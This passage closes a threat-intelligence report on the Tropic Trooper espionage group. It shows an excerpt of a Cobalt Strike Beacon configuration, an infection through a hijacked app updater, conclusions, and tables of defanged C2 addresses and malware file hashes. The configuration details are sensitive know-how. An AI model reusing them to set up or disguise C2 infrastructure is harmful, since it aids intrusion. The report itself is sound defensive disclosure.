UserAgent - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0
HttpPostUri - /Divide/developement/GIZWQVCLF
Malleable_C2_Instructions - Remove 910 bytes from the end
                            Remove 1182 bytes from the beginning
                            NetBIOS decode 'a'
                            XOR mask w/ random key
……skipped……
Watermark - 520
……skipped……
```

-----

◼ This scheme connected to the C2 server 5 times. The actor could filter out non-target connections and did not provide the next artifacts.
◼ The infection vector was the updater of a well-known app.
◼ A variant of Xiangoop was discovered, and the payload was CobaltStrike Beacon.

-----

### Conclusions

◼ Tropic Trooper is still very active in 2024, targeting material industries.
◼ They actively try unconventional intrusions and new methods, unconcerned with the boundary between cyber and physical.
◼ EntryShell and Xiangoop have been updated to become more complex and sophisticated.

-----

##### Lesson Learned

◼ The threat actor uses all means to attack, so always investigate any suspicion and be prepared for the "unknown".
◼ Don't assume general-use items are always safe; that mindset is outdated.
◼ Always question everything and dig deeper.

"Sharp insight" and "strong forensic/reversing skills"

-----

### IoCs

| IP Address | Type |
|---|---|
| 103.234.54[.]128 | CobaltStrike Beacon C2 |
| 45.32.117[.]177 | CobaltStrike Beacon C2 |
| 154.90.62[.]210 | CobaltStrike Beacon C2 |
| 39.101.207[.]15 | Malware Hosted IP |

| File Name | File Hash | Type |
|---|---|---|
| McVsoCfg.dll | D69C86EBB784DFF473816BE8D39F0627 | XiangoopLoader |
| McVsoCfg.dll | 2d818d945736487efe67e626048d6073 | XiangoopLoader |
| WindowsPerformanceRecorderUI.dll | 83536db909a85f041398accd89167888 | Downloader |
| youdaodictupt.exe | 16a37c7c2f8b7310ee8ef2dcd33af39b | Downloader |
| Script.js | E19abad9ec2887c9b6e4ccc62171f730 | Powershell embedded |

-----

### References

https://www.virusbulletin.com/uploads/pdf/conference/vb2023/slides/Slides-Unveiling-Activities-of-Tropic-Trooper.pdf
https://blog-en.itochuci.co.jp/entry/2023/09/28/171001
https://blog-en.itochuci.co.jp/entry/2023/10/06/173200
https://jsac.jpcert.or.jp/archive/2024/pdf/JSAC2024_2_3_sasada_hazuru_en.pdf
https://documents.trendmicro.com/assets/wp/wp-operation-tropic-trooper.pdf
https://citizenlab.ca/2016/11/parliament-keyboy/
https://www.macnica.co.jp/business/security/security-reports/pdf/cyberespionage_report_2022.pdf
https://www.ncsc.gov.uk/files/NCSC-MAR-SparrowDoor.pdf
https://www.welivesecurity.com/2021/09/23/famoussparrow-suspicious-hotel-guest/
https://www.trendmicro.com/en_fi/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html
https://www.eset.com/int/about/newsroom/press-releases/research/eset-research-discovers-famoussparrow-apt-group-spying-on-hotels-governments-and-private-companies/

-----